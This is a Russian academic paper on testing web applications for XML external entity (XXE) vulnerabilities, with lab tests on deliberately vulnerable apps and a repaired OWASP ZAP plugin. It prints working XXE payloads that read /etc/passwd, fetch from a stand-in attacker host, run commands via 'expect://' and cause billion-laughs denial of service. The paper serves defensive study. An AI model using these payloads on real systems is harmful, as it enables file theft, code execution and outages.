Научная статья на тему 'Тестирование уязвимостей во внешних сущностях xml веб-приложений'

Тестирование уязвимостей во внешних сущностях xml веб-приложений Текст научной статьи по специальности «Компьютерные и информационные науки»

CC BY
762
114
i Надоели баннеры? Вы всегда можете отключить рекламу.
Ключевые слова
OWASP TOP TEN / XXE-УЯЗВИМОСТИ / BURPSUITE / XXEINJECTOR / OWASP ZAP / ZAP REST API / QT

Аннотация научной статьи по компьютерным и информационным наукам, автор научной работы — Осинцев А. А., Лапонина О. Р.

В работе рассмотрено понятие внешних сущностей в языке XML, приведены наиболее популярные сценарии выполнения атак на веб-приложения с использованием внешних сущностей XML. Выполнен краткий сравнительный обзор инструментальных средств динамического тестирования XXE-уязвимостей. Описан процесс развертывания стенда для тестирования веб-приложений на наличие XXE-уязвимости и реализованы различные сценарии тестирования как вручную, так и с применением сканера OWASP ZAP. Также приведены доработки ПО OWASP ZAP, которые были осуществлены в ходе выполнения работы. Тестирование XXE выполнено на двух приложениях: OWASP Multillidae и XXELab. Реализован модуль, позволяющий через REST API настроить ZAP, запустить сканер на активное сканирование XXE-уязвимостей и получить отчет о работе. Автоматизация поиска уязвимостей реализована с помощью REST API и Qt.

i Надоели баннеры? Вы всегда можете отключить рекламу.

Похожие темы научных работ по компьютерным и информационным наукам , автор научной работы — Осинцев А. А., Лапонина О. Р.

iНе можете найти то, что вам нужно? Попробуйте сервис подбора литературы.
i Надоели баннеры? Вы всегда можете отключить рекламу.

Vulnerability Testing in Web Applications External Entities XML

The paper considers the concept of external entities in the XML language, provides the most popular scenarios for executing attacks on web applications using external XML entities. A brief comparative review of dynamic testing tools for XXE-vulnerabilities has been performed. Described the process of deploying the stand for testing web applications for the presence of XXE vulnerability and implemented various testing scenarios both manually and using the OWASP ZAP scanner. There are also improvements to the OWASP ZAP software that were implemented during the course of the work. XXE testing was performed on two applications: OWASP Multillidae and XXELab. A module has been implemented that allows you to configure ZAP through the REST API, run the scanner to actively scan XXE vulnerabilities and get a report on the work. Vulnerability search automation is implemented using the REST API and Qt.

Текст научной работы на тему «Тестирование уязвимостей во внешних сущностях xml веб-приложений»

Тестирование уязвимостей во внешних сущностях XML веб-приложений

А.А. Осинцев, О.Р. Лапонина

Аннотация - В работе рассмотрено понятие внешних сущностей в языке XML, приведены наиболее популярные сценарии выполнения атак на веб-приложения с использованием внешних сущностей XML. Выполнен краткий сравнительный обзор инструментальных средств динамического тестирования XXE-уязвимостей. Описан процесс развертывания стенда для тестирования веб-приложений на наличие XXE-уязвимости и реализованы различные сценарии тестирования как вручную, так и с применением сканера OWASP ZAP. Также приведены доработки ПО OWASP ZAP, которые были осуществлены в ходе выполнения работы. Тестирование XXE выполнено на двух приложениях: OWASP Multillidae и XXELab. Реализован модуль, позволяющий через REST API настроить ZAP, запустить сканер на активное сканирование XXE-уязвимостей и получить отчет о работе. Автоматизация поиска уязвимостей реализована с помощью REST API и Qt.

Ключевые слова - OWASP Top Ten, XXE-уязвимости, BurpSuite, XXEinjector, OWASP ZAP, ZAP REST API, Qt.

I. Введение

В настоящее время мы наблюдаем бурное развитие технологий, используемых в сети Интернет. Вместе с этим расширяется и круг задач, которые приходится решать с помощью веб-технологий. Одной из таких технологий являются веб-приложения, от правильного функционирования которых зачастую полностью зависят бизнес-процессы многих компаний.

Важный принцип разработки веб-приложений -проверка на соответствие современным стандартам безопасности. Существуют два общепринятых списка уязвимостей: OWASP Top-10 и SANS 25. Следование рекомендациям OWASP позволяет существенно снизить количество уязвимостей и ошибок в программном обеспечении. В рамках данной работы мы будем опираться на первый список. OWASP - это открытое сообщество, основанное в 2001 году и занимающееся разработкой руководств по защите ПО, а также созданием программных средств для тестирования ПО на наличие уязвимостей. В

Статья получена 03 сентября 2019.

А.А. Осинцев - МГУ имени М.В. Ломоносова (email: [email protected]).

О.Р. Лапонина - МГУ имени М.В. Ломоносова (email: [email protected]).

OWASP существует множество проектов, один из которых OWASP Top 10 - список наиболее опасных уязвимостей в веб-приложениях, который обновляется раз в 3-4 года. Самая свежая редакция была выпущена в 2017г. По сравнению с версией от 2013 г. есть ряд изменений, одно из которых -включение в список новой уязвимости, которая называется внедрение XXE и использует внешние сущности XML [1], [2].

II. Постановка задачи

Целью работы было проанализировать уязвимости, связанные с использованием внешних сущностей XML в веб-приложениях, так называемые ХХЕ-уязвимости, и предложить способы защиты от подобных уязвимостей. Также было разработано расширение для прокси-сервера ZAP, выявляющее наличие ХХЕ-уязвимостей.

III. Анализ уязвимостей при

ИСПОЛЬЗОВАНИИ ВНЕШНИХ СУЩНОСТЕЙ XML A. Понятие внешних сущностей XML Внедрение XXE - это атака на приложение, в котором используется XML-файл, содержащий внешние сущности. В результате этой атаки злоумышленник может вызвать отказ в обслуживание (DoS) и/или получить доступ к локальным или удаленным файлам и службам.

Для того чтобы можно было подключать часто используемые фрагменты XML-документов, было введено понятие сущности. В DTD сущность можно определить с помощью директивы <!ENTITY name "value"> и далее обращаться к ней посредством &name. Для того чтобы можно было перенести часть логики на внешний сервис, было разработано понятие внешней сущности (External Entity). Примеры объявления внешних сущностей XML [1]:

<!ENTITY open-hatch SYSTEM

"http://www.textuality.com/boilerpla te/OpenHatch.xml">

<!ENTITY open-hatch PUBLIC

//Textuality//TEXT Standard hatch boilerplate//EN"

open-

"http://www.textuality.com/boilerpla te/OpenHatch.xml">

<!ENTITY hatch-pic SYSTEM

"../grafix/OpenHatch.gif" NDATA gif >

Программы, которые в приложении выполняют синтаксический и семантический разбор XML-документа, называются XML-процессорами. Они могут быть валидирующими и невалидирущими. Согласно стандарту валидирующий XML-процессор обязан включить содержимое внешнего файла, так как для того чтобы проверить структуру документа, XML-процессор должен проверить все внешние связи. Невалидирующий XML-процессор включает содержимое внешнего файла в зависимости от своих настроек.

B. Сценарии атак

Самый простой способ выполнения атаки - это загрузка файла, который интересует нарушителя, в HTML-страницу, если загрузка внешней сущности поддерживается XML-процессором и веб-приложением.

Атаки могут включать раскрытие локальных файлов, которые могут содержать чувствительные данные, такие как пароли или частные данные пользователя. В этом случае может использоваться схема file: или относительные пути в системном идентификаторе. Поскольку атака выполняется на приложение, обрабатывающее XML-документ, злоумышленник может использовать тот факт, что это приложение является доверенным, и тем самым развить дальше атаку на другие внутренние системы, возможно, раскрывая внутреннее содержание через запросы http(s) или запуская CSRF-атаку на любые незащищенные внутренние сервисы.

В некоторых ситуациях библиотека XML-процессора, которая имеет уязвимости, может быть использована для доступа к вредоносному URI или позволит выполнение произвольного кода под учетной записью приложения.

Следует обратить внимание, что приложению не нужно явно возвращать ответ злоумышленнику, чтобы оно было уязвимо для раскрытия информации.

1) Доступ к локальным и удаленным файлам и ресурсам

В этом случае злоумышленник пытается получить содержимое локального файла или другого ресурса, используя в качестве внешней сущности путь до этого файла или ресурса:

<!ELEMENT foo ANY >

<!ENTITY xxe SYSTEM

"file:///etc/passwd" >]> <foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM

"file:///dev/random" >]> <foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [

<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM

"file:///c:/boot.ini" >]> <foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [

<!ELEMENT foo ANY >

<!ENTITY xxe SYSTEM

"http://www.attacker.com/text.txt" >]>

<foo>&xxe;</foo>

2) Удаленное выполнение кода

Если нарушителю «повезет», и загружен модуль «expect» PHP, то можно выполнить удаленный код:

<?xml version="1. 0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [ <! ELEMENT foo ANY

>

<! ENTITY xxe SYSTEM

"expect://id" >]> <creds>

<user>&xxe;</user> <pass>mypass</pass> </creds>

3) DoS-атака

Рассмотрим пример атаки «billion laughs», которая была описана в статье Б. Салливана [6]. В соответствии с синтаксисом сущности XML именованные сущности могут быть раскрыты в виде последовательностей других сущностей. Так как ограничений на вложенность нет, мы можем добиться представления очень длинных текстовых

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [

строк:

< DOCTYPE xxe [

< ENTITY a "1234567 3 9 0">

< ENTITY b

"&a ;&a;&a;&a;&a;&a;&a ;&a;&a;">

< ! ENTITY c

"&b;&b;&b;&b;&b;&b;&b;&b; &b;">

<! ENTITY d

"&c;&c;&c;&c;&c;&c;&c;&c; &c;">

<!ELEMENTxxe (#PCDATA)>

]>

<xxe>&d;</xxe>

Таким образом, маленький XML-документ может вызвать большое потребление большого количества ресурсов при выполнении его разбора. Это и есть типичная DoS-атака.

IV. Методы поиска XXE-уязвимостей в

ВЕБ-ПРИЛОЖЕНИЯХ A. Статическое тестирование Согласно руководству OWASP по предотвращению XXE ([4], [6]) один из способов защиты - это анализ кода вручную. А именно, следует проанализировать какие nXML-процессоры используются в приложении и правильно ли они настроены. Самый простой и надежный способ защиты - это полное отключение DTD. Вместо него для проверки валидности документов можно применять XSD (XML Schema). В зависимости от XML-процессора метод отключения DTD может быть разным, но он должен выглядеть аналогично следующему:

factory.setFeature("http://apache.or g/xml/features/disallow-doctype-decl", true);

Так как в настоящее время существует большое количество приложений, которые используют DTD, полное отключение бывает невозможно. В этом случае отключение внешних сущностей и объявление типов документов должно быть отключено методами конкретного XML-процессора. Рекомендации по настройке наиболее популярных XML-процессоров приведены в [6].

B. Сравнение различных инструментальных средств динамического тестирования XXE Существует ряд инструментов, с помощью которых можно осуществлять поиск уязвимостей XXE, например BurpSuite, XXEinjector, OWASP Zap.

1) BurpSuite

Очень популярный инструмент тестирования, который представляет собой интегрированную платформу, позволяющую проводить атаки на веб-приложения. BurpSuite включает в себя различные утилиты, основанные на едином фреймворке, который позволяет перехватывать и показывать пользователю HTTP-сообщения, работать с аутентификацией, прокси-серверами и

производить логирование различных данных. Основные утилиты Burp Suite:

Proxy - прокси сервер, перехватывающий сообщения, проходящие по протоколу HTTP(S) в режиме «man-in-the-middle». Находясь между браузером и целевым веб-приложением, он позволяет перехватывать, изучать и изменять трафик, идущий в обоих направлениях.

Spider - веб-паук, позволяющий в автоматическом режиме собирать информацию о содержимом и функционале приложения.

Scanner - утилита для автоматического поиска уязвимостей в веб-приложениях.

Intruder - гибкая в настройках утилита, позволяющая в автоматическом режиме производить атаки различного вида. Например, перебор идентификаторов, сбор важной информации, фаззинг и прочее.

Repeater - инструмент для ручного изменения и повторной отсылки отдельных HTTP-запросов, а также для анализа ответов приложения.

Sequencer - утилита для анализа качества генерации случайных данных приложения (например, идентификаторов сессий) на возможность предсказания их алгоритма.

Decoder - утилита для ручного или автоматического декодирования данных приложения.

Comparer - инструмент для поиска визуальных различий между двумя вариациями данных.

Extender - инструмент для добавления расширений в BurpSuite

Этот инструмент обладает большой базой уязвимостей. По статистике bug-репортов видно, что практически везде был использован именно он. Полная версия является платной, существует также бесплатная версия, функционал которой сильно ограничен.

2) XXEinjector

Данный инструмент предназначен для автоматизация поиска XXE-уязвимостей. XXEinjector автоматизирует извлечение файлов с использованием встроенных и внешних (подключаемых) методов.

3) OWASP Zap

Очень популярный активный сканер безопасности. Предназначен для широкого круга пользователей независимо от их опыта в тестировании веб-безопасности. Прост в использовании, обладает интуитивно понятным интерфейсом и открытым исходным кодом. Инструмент бесплатный и поддерживается многочисленными добровольцами со всего мира.

Основные компоненты ZAP:

- Прокси, функционирующий в качестве «Man-in-the -middle»;

- Модули паук (традиционный и AJAX);

- Модуль активной атаки, который может модифицировать запросы и анализировать ответы от сервера;

- Модуль пассивной атаки, выполняющий просмотр трафика, без возможности модификации;

Следует отметить, что данный инструмент обладает рядом важных особенностей: кроссплатформенность, обширная справка, перевод на десятки языков, наличие JenkinsPlugin, который позволяет исследовать приложение на уязвимости через систему контроля версий, возможность написания собственных плагинов.

iНе можете найти то, что вам нужно? Попробуйте сервис подбора литературы.

V. Использование сканера ZAP для поиска XXE-уязвимостей

A. Описание стенда

Для тестирования приложения на наличие ХХЕ-уязвимостей был развернут стенд, состоящий из следующих компонент:

• Сканер уязвимостей ZAP;

• Плагин, содержащий правила активного сканирования, в состав которого входит правило для поиска XXE;

• Два тестовых приложения, заведомо содержащие уязвимости: XXELab и OWASP Multillidae;

• OWASP Multillidae - бесплатное приложение с открытым исходным кодом, содержит уязвимости из OWASP Top Ten, используется в различных обучающих курсах по веб-безопасности. Это приложение написано на языке PHP и для

работы требует наличие MySql и сервера (например, Tomcat);

• XXELab - простое веб-приложение, содержащее только уязвимость XXE, также требует наличие сервера.

Для удобства и простоты переноса стенд был развернут на виртуальной системе Debian 9.

Установка и настройка веб-приложений отнимает много времени. Для решения этой проблемы можно использовать Docker. Docker -это платформа, предназначенная для управления различными приложениями в системах, которые поддерживают виртуализацию. С помощью докера приложение со всеми зависимостями и окружением упаковывается в контейнер, это позволяет легко переносить приложение на другую систему без дополнительной настройки. Docker состоит из репозитория контейнеров (DockerHub) и клиентской программы, с помощью которой осуществляется работа с контейнером. В DockerHub есть готовые контейнеры для наиболее распространенных приложений, это дает возможность воспользоваться готовым решением и не собирать свой контейнер с нуля. В ходе данной работы мы будем использовать два Docker-контейнера (табл. 1).

Таблица 1. Используемые Docker-контейнеры

Названия docker-контейнеров

Multillidae citizenstig/nowasp

XXELab rrodrigo/xxelab

Рисунок 1. Схема стенда

В. Тестирование уязвимости вручную

В процессе выполнения работы было протестировано внедрение XXE на двух приложениях: OWASP МиШМае и XXELab. При работе было использовано «Руководство OWASP по тестированию» [4].

1) OWASP МиШ1Мае

В этом приложении есть меню, с помощью которого можно перейти на страницу с нужной уязвимостью из разных версий Top10. Таким

образом, на странице /index.php?page=xml-validator.php можно попробовать совершить атаку XXE путем ввода в текстовое поле XML-кода.

Берем код из строки «Example» и добавляем к нему обработку внешней сущности «file:///etc/passwd» (рис. 2). В поле «TextContentParsedFromXML» отобразится

результат выполнения кода, в нашем случае список паролей (рис. 3).

Рисунок 2. Ввод XML-кода

Рисунок 3. Результат внедрения

2) XXELab

В этом тестовом приложении представлена страница регистрации нового пользователя. При попытке регистрации мы получаем сообщение, что пользователь с таким email уже существует. Можем попробовать в поле email внедрить XXE-сущность. Для этого переводим браузер в режим разработчика, нажимаем на странице на кнопку

New Request

«Create account» и в браузере во вкладке «Network Manager» смотрим содержимое запроса и видим, что поля аккаунта передаются на сервер в XML виде. Добавляем в код запроса внешнюю сущность и повторяем запрос (рис. 4). Анализируем ответ сервера и делаем вывод, что уязвимость сработала (рис. 5).

Send Сапсе

http ://localhost/process. php

Request Headers:

Host: localhost

User-Agent: Mozilla/5.0 (XIlj Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */*

Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/ Content-Length: 203 Content-Type: text/plainjcharset=UTF-8

Cookie: security levsl=0: PHP5E5SID=Zral9iiaD3QQmhfaain3d^knQLsbflwhlDt^-l_

Request Body:

< ?xml version="1.0" encoding="UTF-8"?>

< IDOCTYPE foo [< ¡ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root>

<name>l</name>

<tel>l</tel>

<email>&xxe;|</email>

<r)JasLSWOLi:d>.hua<yr)Jai3LSWOLrd>...............................................................................................................................................................................

Рисунок 4. Отредактированный POST-запрос

Headers ' Preview

Respons

Timings

Sorry, root:X:0:0:root:/root:/bin/bash daemon:X:l :1 :daemon:/usr/sbin:/usr/sbin/nologin bin:X:2:2:bin:/bin:/usr/sbin/nologin sys:X:3:3:sys:/dev:/usr/sbin/nologin sync:X:4:65534:sync:/bin:/bin/sync games:X:5:60:games:/usr/games:/usr/sbin/nologin man:X:6:12:man:/var/cache/man:/usr/sbin/nologin lp:X:7:7:lp:/var/sp00l/lpd:/llsr /sbin/nologin mail:X:B:B:mail:/var/mail:/usr/sbin/nologin news:X:9:9:news:/var/spool/news: /usr/sbin/nologin UUCp:X:10:10:UUCp:/Var/SpOOl/UUCp:/USr/Sbin/nOlOgin proxy:x:l 3:13:proxy:/bin:/usr/sbin/nologin www-data :x:33:33:www-data:/var/www:/usr /sbin/nologin backup:X:34:34:backup:/var/backups:/usr/sbin/nologin list:X:3B:3B ¡Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:X:41:41 :Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

■ Response payload

1 Sorry, root;x:0:0:root:/root:/bin/bash

2 daemon:x:l:l:daemon:/Lj5r/5bin:/u5r/sbin/nologin

3 bin:x;2:2:bin:/bin;/ij5r/5bin/nologin

4 sy's : x : 3: 3: sys : / dEY : /us r/sbin/nnl agin B sync:x:4 S5534:sync:/bin:/bin/sync

6 gaijies:x:5:60:gaijies:/Lisr/game5:/iisr/sbin/nologin

7 man:x:6:12:nan:/var/cache/man:/usr/sbin/nologin

8 Ip : x : 7: 7; Ip ; /va r/5pool /Ipd : /usr/sbin/nologin

9 mail:x:8:S:nail:/var/nail:/usr/sbin/nologin

10 news:x:9;9:news:/var/spool/news /usr/sbin/nologin

11 iiiicp:x:lQ:10:iiiicp:/var/spool/Liucp:/iisr/sbin/nologin

12 proxy:x:13:13:proxy:/bin:/usr/5bin/nologin

13 www-data x:33:33:www-data:/var/www/usr/sbin/nologin

14 backup:x:34:34:backup:/var/backups:/iisr/sbin/nolcigin

15 list:x:38:38:Mailing List Manager :/va r/list :/lis r/sbin/nologin

Рисунок 5. Ответ сервера

Эту уязвимость можно найти с помощью различных инструментов. В нашей работе будем использовать OWASP ZAP. Для запуска сканера необходимо ввести адрес цели в строку «Urltoattack» и нажать кнопку «Attack». Сначала запускается модуль паук, который ищет в приложении доступные URL-адреса, которые служат точками входа для последующих атак.

F'ersist Lot

Затем запускается модуль активное сканирование, который осуществляет поиск уязвимостей в соответствии с выставленной политикой сканирования. Политику сканирования можно редактировать путем включения или выключения различных плагинов. На рис. 7 представлен отчет о результатах сканирования.

Рисунок 6. Схема ручного сканирования

V

V Alerts 13)

► 1'ь Xi rame-Option s Header Mot Set {2}

* . web Browser зге5 Proteition Not Enabled (4} - . X-Content-Type-Options HeaderMissing 14)

Рисунок 7. Отчет о результатах сканирования

Из отчета видно, что искомая уязвимость обнаружена не была. При анализе описания и исходных кодов на github, было обнаружено, что блок, отвечающий за поиск XXE уязвимости, в версию Release не включен, но данный блок был обнаружен в Beta-версии в составе плагина AscanbetaRules. После установки данного плагина в ZAP было проведено повторное сканирования, но результат остался неизменным. После работы с исходным кодом блока XXEPlugin было обнаружено, что в коде есть ошибка.

Принцип работы плагина следующий.

Посылаем запрос на сервер, получаем ответ. Анализируем поле ContentType в заголовке ответа на наличие в нем XML. И если xml найден, то в зависимости от режима, в котором работает ZAP, запускается один из способов анализа XML. В данном коде для анализа был использован заголовок из экземпляра пустого класса HtmlMessage. Так как содержимое поля ContentType в таком случае всегда нулевое, то работа плагина невозможна. Исправленный код был скомпилирован и собранный файл дополнения был установлен в ZAP. После повторного сканирования мы получили следующий отчет (рис. 8).

Рисунок 8. Отчет об обнаружении XXE уязвимости

C. Автоматизация поиска уязвимостей при

тестировании с помощью RESTAPI и Qt

В OWASP ZAP предусмотрена работа через REST API. Этот инструмент позволяет разработчику использовать различные модули ZAP в своем приложении. Задачей данной работы было удаленно настроить модуль активное сканирование для поиска XXE-уязвимости, запустить сканер и получить отчет о работе.

Для решения данной задачи можно воспользоваться готовыми библиотеками для Java и Python, которые являются оберткой для REST API, либо работать напрямую с REST API с помощью любого языка программирования, который поддерживает HTTP протокол.

Управление ZAP через API осуществляется с помощью запросов, которые имеют следующий вид:

http://zap_url/<format>/<component>/<ope ration>/<operation_name>[/?<parameters>]

Описание формата запроса приведено в табл. 2.

Таблица 2. Формат запроса

Zap_url Адрес, на котором запущен прокси ZAP

<format> Формат ответа, который присылает ZAP. Доступны "JSON", "XML", "HTML"

<component> Название компонента *1)

<operation> Тип операции, может быть view или action

<operation_name> Название операции

<parameters> Входные параметры для операции

Для просмотра доступных компонентов и операций можно воспользоваться API UI.

В настоящее время API поддерживает только GET-запросы. Примеры запросов:

http://zap url/JSON/spider/view/stat us/?zapapiformat=JSON&formMethod=GET &scanId=1

http://zap url

/OTHER/core/other/mdreport/?formMeth

od=GET

Для работы со сканером было разработано приложение на Qt5 [8]. В этом приложении использовались библиотеки

QNetworkAccessManager, QNetworkRequest для работы с RESTAPI и библиотеки QJsonDocument, QJsonObject, QJsonArray для обработки ответов в формате JSON. Это приложение позволяет проводить сканирование в автоматическом режиме, схема стенда показана на рис. 9.

В ходе выполнения данной работы, с помощью разработанной программы было просканировано веб-приложение XXELab в соответствии со следующим алгоритмом:

iНе можете найти то, что вам нужно? Попробуйте сервис подбора литературы.

1) Проверяем, добавлена ли нужная политика сканирования в ZAP;

2) Если нет, то добавляем политику;

3) Запускаем паук, для поиска доступных узлов;

4) Запускаем сканер по нужному узлу;

5) Запрашиваем отчет.

Графический интерфейс программы показан на рис 10.

Рисунок 9. Схема автоматического сканирования

cbetk [K^fTwIs -> Çliotk Pdtiqri

Рисунок 10. Графический интерфейс разработанной п

VI. Заключение

В рамках данной работы было выполнено:

1) Проведен анализ уязвимости, связанной с использованием внешних сущностей;

2) Рассмотрены сценарии проведения атаки;

3) Рассмотрены возможности различных инструментов динамического тестирования;

4) Уязвимость протестирована на реальных приложениях;

5) Продемонстрированы ручной и автоматический метод сканирования с помощью средства для поиска и анализа различных уязвимостей ZAP с использованием расширения собственной разработки.

Библиография

[1] XML 1.0. W3C Recommendation / https://www.w3.org/TR/REC-xml/

[2] XML Schema, DTD and Entity Attack. A Compendium of Known Techniques Version 1.0 / Timothy D. Morgan, Omar Al Ibrahim - Virtual Security Research, LLC, 2014, p.36.

[3] OWASP TOP 10 - 2017 rcl. The Ten Most Critical Web Application Security Risks / J. Williams, D. Wichers. -OWASP Foundation, 2017, p.23.

[4] Testing Guide / M. Meucci, A. Muller. - OWASP Foundation, v4.0, 2014, p.384.

[5] XML External Entity Attacks (XXE) / S. Herzog -OWASP Foundation, 2010, p.41.

[6] B. Sullivan. Security Briefs - XML Denial of Service Attacks and Defenses / https://msdn.microsoft.com/en-us/magazine/ee3 35713.aspx

[7] D. Wichers, X. Wang, J. Jardine, T. Hsu, D. Fleming. XML External Entity Prevention Cheat Sheet / https://github.com/OWASP/CheatSheetSeries/blob/mast er/cheatsheets/XML_External_Entity_Prevention_Cheat _Sheet.md

[8] Qt 5.3. Профессиональное программирование на C++ / М. Шлее - БХВ-Петербург, 2015. - с. 928.

Vulnerability Testing in Web Applications External Entities XML

Aleksandr A. Osincev, Olga R. Laponina

Abstract - The paper considers the concept of external entities in the XML language, provides the most popular scenarios for executing attacks on web applications using external XML entities. A brief comparative review of dynamic testing tools for XXE-vulnerabilities has been performed. Described the process of deploying the stand for testing web applications for the presence of XXE vulnerability and implemented various testing scenarios both manually and using the OWASP ZAP scanner. There are also improvements to the OWASP ZAP software that were implemented during the course of the work. XXE testing was performed on two applications: OWASP Multillidae and XXELab. A module has been implemented that allows you to configure ZAP through the REST API, run the scanner to actively scan XXE vulnerabilities and get a report on the work. Vulnerability search automation is implemented using the REST API and Qt.

Keywords - OWASP Top Ten, XXE vulnerabilities, BurpSuite, XXEinjector, OWASP ZAP, ZAP REST API, Qt.

References

[1] XML 1.0. W3C Recommendation / https://www.w3.org/TR/REC-xml/

[2] XML Schema, DTD and Entity Attack. A Compendium of Known Techniques Version 1.0 / Timothy D. Morgan, Omar Al Ibrahim - Virtual Security Research, LLC, 2014, p.36.

[3] OWASP TOP 10 - 2017 rcl. The Ten Most Critical Web Application Security Risks / J. Williams, D. Wichers. -OWASP Foundation, 2017, p.23.

[4] Testing Guide / M. Meucci, A. Muller. - OWASP Foundation, v4.0, 2014, p.384.

[5] XML External Entity Attacks (XXE) / S. Herzog -OWASP Foundation, 2010, p.41.

[6] B. Sullivan. Security Briefs - XML Denial of Service Attacks and Defenses / https://msdn.microsoft.com/en-us/magazine/ee3 35713.aspx

[7] D. Wichers, X. Wang, J. Jardine, T. Hsu, D. Fleming. XML External Entity Prevention Cheat Sheet / https://github.com/OWASP/CheatSheetSeries/blob/mast er/cheatsheets/XML_External_Entity_Prevention_Cheat _Sheet.md

[8] Qt 5.3. Professional'noe programmirovanie na C++ / M. Shlee - BHV-Peterburg, 2015. - s. 928..

i Надоели баннеры? Вы всегда можете отключить рекламу.